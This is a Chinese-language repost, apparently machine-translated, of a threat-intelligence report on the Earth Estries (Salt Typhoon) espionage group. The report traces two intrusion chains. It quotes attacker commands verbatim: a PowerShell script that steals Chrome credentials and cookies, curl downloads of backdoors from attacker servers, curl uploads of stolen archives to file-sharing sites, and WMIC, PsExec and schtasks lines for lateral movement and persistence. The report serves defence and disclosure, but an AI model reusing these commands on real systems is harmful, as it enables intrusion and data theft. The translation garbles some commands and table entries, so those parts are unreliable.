声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。
原文地址:https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html
概括
Earth Estries 在其活动中采用了两种不同的攻击链,它们具有一些共同的特征,例如利用 Microsoft Exchange 服务器和网络适配器管理工具等系统中的漏洞。
第一条感染链使用 PsExec 以及通过 CAB 文件传递的 Trillclient、Hemigate 和 Crowdoor 等工具,而第二条感染链则使用通过 cURL 下载传递的 Zingdoor 和 SnappyBee 等恶意软件。
Earth Estries 通过不断更新其工具来保持持久性,并利用后门进行横向移动和凭证盗窃。
数据收集和泄露是使用 Trillclient 执行的,而 cURL 等工具则用于将信息发送到匿名文件共享服务,并使用代理来隐藏后门流量。
介绍
2023 年初,我们发表了一篇博客文章,介绍了Earth Estries(又名 Salt Typhoon)针对政府和科技行业的攻击活动,该组织是一个高级威胁行为者,至少自 2020 年以来一直活跃。在本报告中,我们分析了该组织发起的两条不同的攻击链,展示了他们用来破坏目标系统的各种策略、技术和工具。
这两个攻击链有一些共同点,比如滥用易受攻击的攻击面,例如 Microsoft Exchange 服务器和网络适配器管理工具。但是,它们也存在显著差异。第一个攻击链使用PsExec和 WMI 命令行 (WMIC) 进行横向移动,使用 Cobalt Strike、Trillclient、Hemigate 和 Crowdoor 等工具,这些工具通过CAB文件包提供。第二个攻击链展示了一种不同的方法,使用 Zingdoor、Cobalt Strike 和 SnappyBee 等恶意软件以及 PortScan 和 NinjaCopy 等实用工具,这些工具通过 curl 下载提供。
两种攻击链都表现出了持久性,即不断更新现有的工具安装,从而可以延长攻击活动的时间,并能够留在受感染的网络中。
第一条感染链
在第一个攻击场景中,Earth Estries 使用 QConvergeConsole(一种基于 Web 的管理工具,用于配置和管理 QLogic 光纤通道适配器)作为其入侵方法之一,同时使用各种带有 Crowdoor 后门(通过 CAB 文件包提供)的 Cobalt Strike 安装来保持控制。PSExec 在攻击的早期阶段被大量使用,而后门本身也用于横向移动。
Earth Estries 继续利用 Trillclient 从浏览器缓存中窃取用户凭据,以扩大其在网络中的存在。威胁行为者还表现出对目标环境和方法的深入了解,因为他们使用wget从目标的内部基于 Web 的文档管理系统中专门下载文档。
初始访问
我们的遥测表明,Earth Estries 通过利用外部服务或远程管理实用程序中的漏洞获得了对目标系统的初步访问权。
据观察,该组织利用目标服务器中存在漏洞或配置错误的 QConvergeConsole 安装来访问其系统。已安装的远程应用程序代理 (c:\program files\qlogic corporation\nqagent\netqlremote.exe) 可以执行网络发现并在目标机器上安装 Cobalt Strike。
命令C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
C:\Windows\system32\cmd.exe /C copy C:\users\public\music\go4.cab\{HostName}\c$\programdata\microsoft\drm
C:\Windows\system32\cmd.exe /C expand -f:*\{HostName}\c$\programdata\microsoft\drm\go4.cab\{HostName}\c$\programdata\microsoft\drm
C:\Windows\system32\cmd.exe /C c:\users\public\music\PsExec.exe -accepteula\172.16.xx.xx "c:\ProgramData\Microsoft\DRM\g2.bat"
在另一个例子中,他们利用与 QConvergeConsole 捆绑的 Apache Tomcat6 中的漏洞(c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe)执行横向移动活动和后期工具的操作:
命令C:\Windows\system32\cmd.exe /C wmic /node:172.16.xx.xx 进程调用创建“cmd.exe /cc:\ProgramData\Microsoft\DRM\182.bat”
C:\Windows\system32\cmd.exe /CC:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp*.pdf
后门
Cobalt Strike 用作第一阶段后门,执行横向移动并部署第二阶段后门。在之前的行动中,HemiGate 被用作第二阶段后门,以维持对受感染机器的访问。然而,Earth Estries 在这次攻击中使用了新的后门 Crowdoor。
乌鸦门
据观察,新的后门变种Crowdoor与 Cobalt Strike 安装有交互作用,这与 Earth Estries 清理和重新安装工具的工具、策略和程序 (TTP) 一致。Crowdoor 和重新安装的 Cobalt Strike 的两个实例都是由先前的实例作为 CAB 文件引入的。
图 1. Earth Estries 使用的第一个攻击链
CrowDoor新变种的感染链如图2所示。
图 2. Crowdoor 恶意软件的感染链
Crowdoor 会根据相应的参数执行不同的操作。在表 1 中,我们根据所使用的参数总结了新 Crowdoor 变体所表现出的行为。总体而言,其行为与旧变体中的行为类似,不同之处在于注入的进程(msiexec.exe)和命令 ID(如表 2 所示)
| 参数 | 行动 |
|---|---|
| 没有争论 | 通过注册表 Run 项或服务设置持久性,然后重新启动后门 |
| 0 | 通过注册表Run键或服务设置持久性,然后重新启动后门。 |
| 1 | 通过注入“msiexec.exe”重新启动后门 |
| 2 | 后门主函数被调用 |
表 1. 参数列表及其对应的操作
| 旧 Crowdoor 变体 | 新的 Crowdoor 变体 | 功能 |
|---|---|---|
| 0x2347135 | 0x11736212 | 初始连接 C2 |
| 0x2347136 | 0x11736213 | 收集计算机名称、用户名、操作系统版本和主机网络或 IP 信息 |
| 0x2347137 | 0x11736214 | 远程 shell |
| 0x234713B | 0x11736218 | 删除恶意软件文件、驻留并退出 |
| 0x2347140 | 0x1173621D | 文件相关操作 |
| 0x2347141 | 0x1173621E | 打开/读文件 |
| 0x2347142 | 0x1173621F | 打开/写文件 |
| 0x2347144 | 0x11736221 | 收集驱动器信息 |
| 0x2347145 | 0x11736222 | 搜索文件 |
| 0x2347148 | 0x11736225 | 创建目录 |
| 0x2347149 | 0x11736226 | 重命名文件或目录 |
| 0x234714A | 0x11736227 | 删除文件或目录 |
| 0x234714A | 0x11736228 | 与 C&C 服务器通信 |
表 2. 新旧 Crowdoor 变体之间的比较
| 套餐 1 | 套餐 2 | 套餐 3 | 套餐4 |
|---|---|---|---|
| WinStore.exe(主机) | K7Sysmon.exe(主机) | HxTsk.exe(主机) | MsMsRng.exe(主机) |
| SQLite3.dll | 系统信息库 | d3d8.dll | sqlite3.dll |
| 数据状态文件 | 系统信息库 | HxTsk(加密) | msimg32库 |
| 数据表文件 | 系统信息库 | 数据状态文件 | |
| WinStore(加密) | K7Sysmon.dll(加密) | MsMsRng(加密) |
表 3. Crowdoor 软件包
横向移动
Earth Estries 使用 PSExec 横向安装其后门和工具,特别是通过复制包含后门或工具的CAB文件以及批处理文件来执行安装、维持持久性并执行工具。
通常,PSExec 用于复制包含将要横向安装的恶意软件的 CAB 文件。但是,在某些情况下,可以使用 WMIC 代替它来实现类似的结果。然后将复制并执行一组批处理文件以执行恶意软件的提取、安装和执行。也可以使用批处理文件执行大规模收集。
在攻击的后期阶段,后门可能会被直接用于执行横向移动。CAB 文件仍用作要安装的工具的容器,批处理文件仍包含在所述工具的提取、安装和执行中。这有时包括为批处理文件创建持久性机制,以充当实际后门的间接持久性机制。
发现、收集和泄露
TrillClient 的用户凭证发现
Earth Estries 将收集可用于实现其目标的用户凭据。威胁行为者使用TrillClient信息窃取程序执行此例程,主要从浏览器用户配置文件中收集用户凭据。TrillClient 启动 PowerShell 脚本,该脚本将收集要保存在特定位置的用户配置文件:
foreach($users_path 中的 $win_user_path){
echo D | xcopy \“*C:\Users$win_user_path\AppData\Roaming\Microsoft\Protect*” \“$copy_dest_path$win_user_path\Protect\”/ E /C /H;
attrib -a -s -r -h \“$copy_dest_path$win_user_path*\”/ S /D;
echo F | xcopy \“*C:\Users$win_user_path\AppData\Local\Google\Chrome\User Data\Local State*” \“$copy_dest_path$win_user_path\Local State\”/ C;
echo F | xcopy \“*C:\Users$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies*“ \”$copy_dest_path$win_user_path\Default\Network\Cookies\“/C
echo F | xcopy \“*C:\Users$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data*“ \”$copy_dest_path$win_user_path\Default\Login Data\“/C;
$profile_path = Get-ChildItem -Name \“*C:\Users$win_user_path\AppData\Local\Google\Chrome\User Data\*“-IncludeProfile-ErrorAction SilentlyContinue;
foreach($profile_path 中的 $chrome_user_path){
echo F | xcopy \“*C:\Users$win_user_path\AppData\Local\Google\Chrome\用户数据$chrome_user_path\Network\Cookies*""$copy_dest_path$win_user_path$chrome_user_path\Network\Cookies"/C;
echo F | xcopy \"C:\Users$win_user_path\AppData\Local\Google\Chrome\用户数据$chrome_user_path\登录数据** ""$copy_dest_path$win_user_path$chrome_user_path\登录数据"/C; }}**
将从以下文件夹收集数据:
%LOCALAPPDATA%\Google\Chrome\用户数据\本地状态
%LOCALAPPDATA%\Google\Chrome\用户数据<PROFILE>\登录数据
%LOCALAPPDATA%\Google\Chrome\用户数据<PROFILE>\Network\Cookies
%APPDATA%\Microsoft\Protect*
收集到的数据将被临时复制到<%TEMP%\browser_temp_data<RANDOM>>,使用tar命令存档,并使用 XOR 算法加密。
tar -cvf"$copy_dest_path\tar"$copy_dest_path;
$e_a = [System.IO.File]::ReadAllBytes("$copy_dest_path\tar");Remove-Item -Path $copy_dest_path -Recurse;
$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 - ($e_i % 199)));$e_i += 1;
$random_filename ="300775736611547784207972935122149919289871693";
$out_put_file = $out_put_path +"\"+ $random_filename;
echo $out_put_file;
[System.IO.File]
:WriteAllBytes($out_put_file,$e_a);
然后,收集到的数据将通过简单邮件传输协议 (SMTP) 发送到威胁行为者的 Gmail 帐户。
收集敏感文件
Earth Estries 使用 RAR 来收集感兴趣的信息。在此攻击场景中,他们使用 wget 将目标文档从内部基于 Web 的文档管理平台下载到收集文件夹中,然后将其存档。
在这个例子中,执行了一个批处理文件,其中包含将 PDF 文件下载到收集目录的命令,其中包含硬编码的文档名称:
c:\users\public\music\temp\wget.exe -c "hxxp://172.16.xx.xx/{文档路径}/{硬编码文件名}.pdf" -P c:\users\public\music\temp
之后,收集的 PDF 将被存档
C:\Windows\system32\cmd.exe /CC:\Users\Public\Music\rar.exe a -m5 C:\Users\Public\Music\pdf0412.rar C:\Users\Public\Music\temp*.pdf
通过后门收集
Earth Estries 使用 Crowdoor 和 Cobalt Strike 安装进行收集例程,通过从本地和远程位置存档感兴趣的信息。执行的一些收集命令示例如下:
| 示例命令 | 功能 |
|---|---|
| rar.exe a -m5 <安装路径>\322.rar\<远程计算机>\c$<远程路径> | 收集从远程机器收集的上一代感染信息 |
| rar.exe a -m5 <安装路径> \his231.rar "C:\Users<用户名>\AppData\Local\Google\Chrome\User Data\Default\History" | 收集浏览器历史记录文件,这些文件对攻击者来说很重要,因为他们能够窃取更多的凭证 |
| rar.exe a <安装路径>\0311.rar C:\users<用户名>\Desktop*C:\users\ <用户名> \Downloads*C:\users\ <用户名> \Documents*-r -y -ta<截止日期> | 收集本地用户最近交互的文件和/或文档 |
表 4. 收集命令
遥测表明,它们是通过与执行收集命令相同的方法进行泄露的:要么通过其后门的命令和控制 (C&C) 通道,要么通过用于控制这些工具的相同初始访问方法。
第二条感染链
第二次Earth Estries攻击流程概览如图3所示:
图 3. 第二次攻击程序的总体流程
在此攻击程序中,通过利用 Microsoft Exchange 服务器植入允许传送 Cobalt Strike 信标的 Web Shell 来获得初始访问权限。同时,通过初始后门进行横向移动,并在网络内的其他机器上安装其他后门,例如 Zingdoor 和 Snappybee (Deed RAT)。这些额外的后门和工具的传送是通过 C&C 服务器或使用cURL从攻击者控制的服务器下载它们来完成的。这些后门安装也会定期更换和更新。感兴趣的文档通过 RAR 收集,并使用cURL进行泄露,数据被发送到匿名文件共享服务。
初始访问
在跟踪 Earth Estries 近期活动时,我们发现该组织利用微软 Exchange 服务器安装 Web shell ChinaChopper,Earth Estries 通过该 shell 将 Cobalt Strike 部署到其他 Active Directory (AD) 服务器或单个端点,并设置计划任务和系统服务以保持在受害者环境中的持久性。
来自Webshell的命令序列如下:
图4. 访问时的Webshell命令
下载
横向移动、持久性和控制
我们确定了 Earth Estries 用来控制目标机器的四种主要工具:Cobalt Strike、Zingdoor 和 Snappybee。
Zingdoor 是一个用 Golang 编写的 HTTP 后门,是 Earth Estries 部署的重复后门之一。它主要通过使用 Windows Defender 的MsSecEs.exe的 DLL 侧加载来加载。
Snappybee(Deed RAT)是一种模块化后门,据说是ShadowPad的继任者,此前由Postiv Technologies披露。与 Zingdoor 一样,Snappybee 的主要执行方法是通过 DLL 侧加载。
Earth Estries 还在攻击的各个阶段使用了 Cobalt Strike。虽然一些 Cobalt Strike 部署同样使用 DLL 侧载,但其他部署则使用替代加载方法来增强持久性和防御规避能力。许多 Cobalt Strike 安装都配置为使用 DNS 隧道与其 C&C 服务器进行通信
在我们观察到的其中一次攻击中,Zingdoor 被用作第一阶段后门。在攻击程序的后期阶段,我们能够看到其他后门通过先前的安装进行连续部署:Zingdoor 到 Snappybee,然后到 Cobalt Strike(然而,这并不总是部署顺序)。还有一些情况是先前的安装被后续安装清除,例如 Cobalt Strike 在部署 Snappybee 后不久就将其删除。
图 5.部署 Zingdoor、Snappybee 和 Cobalt Strike
下载
Earth Estries 使用的最常见持久性机制是通过计划任务实现的。这些机制可以通过多种方式实现,包括使用WMIC,允许远程创建计划任务:
wmic /node:<IP>/user:<域>\<用户>/password:*进程调用创建“schtasks /run /tn microsoft\sihost”
该例程还使用 cURL 将其他组件下载到远程机器。
| 工具下载 | cURL 命令 |
|---|---|
| Snappybee 有效载荷 | curl -oc:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt |
| Zingdoor | curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx |
| 端口扫描 | curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx |
表 5. 通过 cURL 命令下载工具
通过 PortScan 进行网络发现
后门直接通过命令行执行来发现和映射网络。有时,也会使用 Portscan 来实现此目的。第一组命令下载 PortScan,然后扫描网络以查找指定的开放端口(80、443、445 和 3389):
cmd.exe /c “curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org.pk/Portscan.docx”
cmd.exe /c “C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443”
cmd.exe /c “C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log”
cmd.exe /c “cmd /c “C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443” >>1.log”
Zingdoor 的横向安装
端口扫描步骤完成后,会下载一组 Zingdoor 恶意软件。然后将其复制到端口扫描过程中发现的单独机器上。
cmd.exe /c“curl -k -o C:\programdata\SetupPlatform.exe hxxp://mail.ocac.org.pk/SetupPlatform.docx”
cmd.exe /c“curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org.pk/UNBCL.docx”
cmd.exe /c“复制 C:\programdata\SetupPlatform.exe\172.xx.xx.xx\c$\ProgramData\Microsoft\Windows”
cmd.exe /c“复制 C:\programdata\SetupPlatform.exe\172.xx.xx.xx\c$\ProgramData\Microsoft\Windows”
远程服务创建
通过 ChinaChopper,Earth Estries 可以放置命令来远程创建服务以实现持久性和权限提升。
“cmd”/c cd /d “c:\Windows\IME\IMEJP\”&net use\{主机名} {密码} /user:{用户名}&echo [S]&cd&echo [E]
“cmd”/c cd /d “c:\Windows\IME\IMEJP\”© v.\{主机名} \c$\programdata\vmware&echo [S]&cd&echo [E]
sc\{hostname} 创建 VGAuthtools 类型= own 启动= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"
从创建的服务的配置来看,恶意加载器vmvssrv.exe(用 .NET 程序集编写的恶意加载器)是使用Intallutil.exe(Windows 系统内置的安装实用程序)启动的。然后,vmvssrv.exe加载器将加载并启动 Cobalt Strike 来入侵目标计算机。
远程计划任务
再次使用 ChinaChopper,威胁行为者可以输入命令来远程创建计划任务以实现持久性。
schtasks /create /tn VMware\vmtools /tr "cmd /c"start C:\Programdata\VMware\vmtools.exe"" /sc onstart /ru "" /S 10.131.xx.xx /U {用户名} /P {密码} &echo [S]&cd&echo [E]
所安装的vmtool.exe文件是通过web shell部署的,是一个用于加载Cobalt Strike的恶意加载器。
执行:替代加载方法
Earth Estries 对其工具(尤其是 Cobalt Strike)采用了多种加载方法。除了 DLL 侧载之外,其他加载器组件还设计为通过以下方法使用。
可执行加载器
Cobalt Strike 加载器使用简单的可执行加载器(例如vmtools.exe),这种加载机制将加载名为msvsct.obj 的加密有效负载。此类加载器使用单字节多层 ADD – XOR – SUB 按位运算来解密其有效负载。
图 6. vmtools.exe 解密例程
Rundll32.exe 加载器
还可以部署加载器的 DLL 版本来加载 Cobalt Strike。这涉及通过命令行添加的计划任务以实现持久性:
C:\Windows\system32\cmd.exe /C sc 创建 VMware binpath="rundll32.exe C:\Progra~1\VMware\vmtools.dll,fjdpw03d"启动= 自动显示名称="VMware"
该加载器使用带有自定义字母表的 Base64 解码算法来解密其有效负载。
图 7. 使用 Base64 和自定义字母表的 vmtools.dll
该加载器的后续版本采用单字节 XOR 简化解密方法解密其有效负载。
图 8. 显示 vmtools.dll(顶部)和 audiodg.dll(底部)的代码片段
Msiexec.exe 加载器
Cobalt Strike 也可以使用msiexec.exe通过加载程序组件加载:
msiexec.exe /y C:\Windows\PLA\Performance.dll
该系列的加载器比较简单,采用单字节XOR进行解密。
图9. 加载器使用单字节XOR进行解密
这种类型的安装还附带用于持久性和执行的 Windows 服务:
sc create pasrv binpath=“cmd /c \”start msiexec.exe /y C:\Windows\PLA\Performance.dll\“”start=auto displayname=“Microsoft Performance Alerts Server”
凭证转储
重新实现 NinjaCopy
NinjaCopy 是一款黑客工具,以复制受保护的系统文件的能力而闻名。使用该工具,威胁者可以通过打开整个卷(例如 c:)的读取句柄并解析 NTFS 结构来从 NTFS 卷中复制文件。这使他们能够绕过以下保护措施(请注意,未使用 Win32 API,因此 Windows 不知道这些保护措施已被忽略):
由一个进程打开但不能由其他进程打开的文件,例如NTDS.dit文件或 SYSTEM 注册表配置单元。
在文件上设置的系统访问控制列表 (SACL) 标志,当文件打开时发出警报。(
绕过自主访问控制列表 (DACL),例如仅允许 SYSTEM 打开文件的列表。
在操作过程中,我们注意到Earth Estries利用Velocidex发布的开源NTFS解析器实现了NinjaCopy的新变种,攻击者利用该变种成功从受害者环境中提取了包含敏感数据的SYSTEM注册表hive。
收集和泄露
信息收集是通过 RAR 档案进行的,这些档案大多受密码保护。以下是 Earth Estries 在其中一次活动中使用的 RAR 命令:
rar a -m3 -inul -ed -r -s –hp{密码}-ta{yyyymmdd}-n.pdf -n.ddf -x*"\{避免的路径}"{收集器路径}\out<n>.tmp\{IP}\“{目标路径}“
同时,他们使用的密码如下:
竹速
永远的神
dh2uiwqji9dash
窃取文件是通过 cURL 进行的,它会将被盗文件发送至匿名文件共享服务:
curl -F "file=@c:\windows\ime\out1.tmp" hxxps://api.anonfiles[.]com/uploadcurl -F "file=@c:\windows\ime\out1.tmp" -k hxxps:/file[.]iocurl -F "file=@c:\windows\ime\out3.tmp" hxxps://api.anonfiles[.]com/upload
指挥与控制
通过内部代理服务器隐藏后门流量
我们注意到 Zingdoor 使用的其中一个 C&C 地址是内部 IP 地址。经过进一步调查,我们发现内部地址指的是受害者环境中的内部代理服务器。我们推断威胁行为者试图使用受害者的代理服务器将流量转发到实际的 C&C 服务器,从而使来自后门的流量更难发现。
其他观察
在调查过程中,我们发现了其他后门,包括 Internet 信息服务 (IIS) 后门 (FuxosDoor) 和定制后门 (Cryptmerlin)。
我们不确定这些后门是否确实由 Earth Estries 部署。但是,发生时间大致接近,并且是在同一台受感染的机器中发现的。因此,我们仍然将这些发现纳入本报告中。
福克索斯门
FuxosDoor 是一个 IIS 后门,部署并运行在被入侵的 Exchange 服务器上。一旦它收到攻击者发送的带有特定 URL 路径/web.config 的请求,就会尝试从 HTTP 标头中的字段 (ASP.NET_SessionId) 中提取加密命令,然后使用命令提示符 (cmd.exe) 执行收到的命令。之后,结果将被加密并发送回攻击者的服务器。
图 10. 通过 /web.config 接收请求
图11. 接收内容的解密算法
图 12. 响应的加密算法
密码子
攻击者在目标机器上使用 DLL 侧载技术启动 Cryptmerlin,这是一个基于开源恶意软件Merlin Agent 的定制后门,使用 Golang 编写。与原始 Merlin Agent 不同,Cryptmerlin 目前仅实现ExecuteCommand函数,该函数将通过 HTTP/HTTPS 请求与 C&C 服务器通信。为了降低受感染机器的安全警告,Cryptmerlin 还可以通过代理服务器与 C&C 服务器通信,受害者的内部代理信息也嵌入在配置中。
| 文件名 | 描述 |
|---|---|
| 执行程序 | 合法文件被用作主加载程序 |
| 文件夹管理工具 | 由 svcchost.exe 侧载的 DLL;简单的加载程序将查找并加载另一个名为 svcchost.dll 的 DLL 文件 |
| 主机名 | 恶意负载,即后门恶意软件 Cryptmerlin |
表 4. Crypmerlin 后门使用的文件
结论
我们对 Earth Estries 在长期网络行动中的持续 TTP 的分析表明,该威胁行为者是一个复杂且适应性强的威胁行为者,它使用各种工具和后门,不仅展示了技术能力,而且还展示了在受损环境中维持访问和控制的战略方法。
在第一个感染链中,Earth Estries 利用了 QConvergeConsole 等基于 Web 的适配器管理工具中的漏洞,并使用了通过 CAB 文件包传递的 Cobalt Strike、Hemigate 和 Crowdoor 等工具。这些后门与 PsExec 一起促进了整个网络的横向移动。利用 Trillclient 从浏览器缓存中获取凭证进一步说明了该组织旨在加深其在目标环境中立足点的全面策略。
在第二个感染链中,Earth Estries 利用了易受攻击的 Exchange 服务器,利用了 ChinaChopper 等 Web Shell 以及 Zingdoor、SnappyBee 和 Cobalt Strike 等其他后门,所有这些都凸显了 Earth Estries 工具包的多样性。通过 C&C 渠道部署这些工具,以及使用 DLL 侧载和 cURL 等技术下载组件,凸显了它们适应防御措施的能力。
在整个攻击活动中,Earth Estries 一直对目标环境有着敏锐的了解,不断识别可重新进入的暴露层。通过结合使用现有工具和自定义后门,他们创建了一种难以检测和缓解的多层攻击策略。
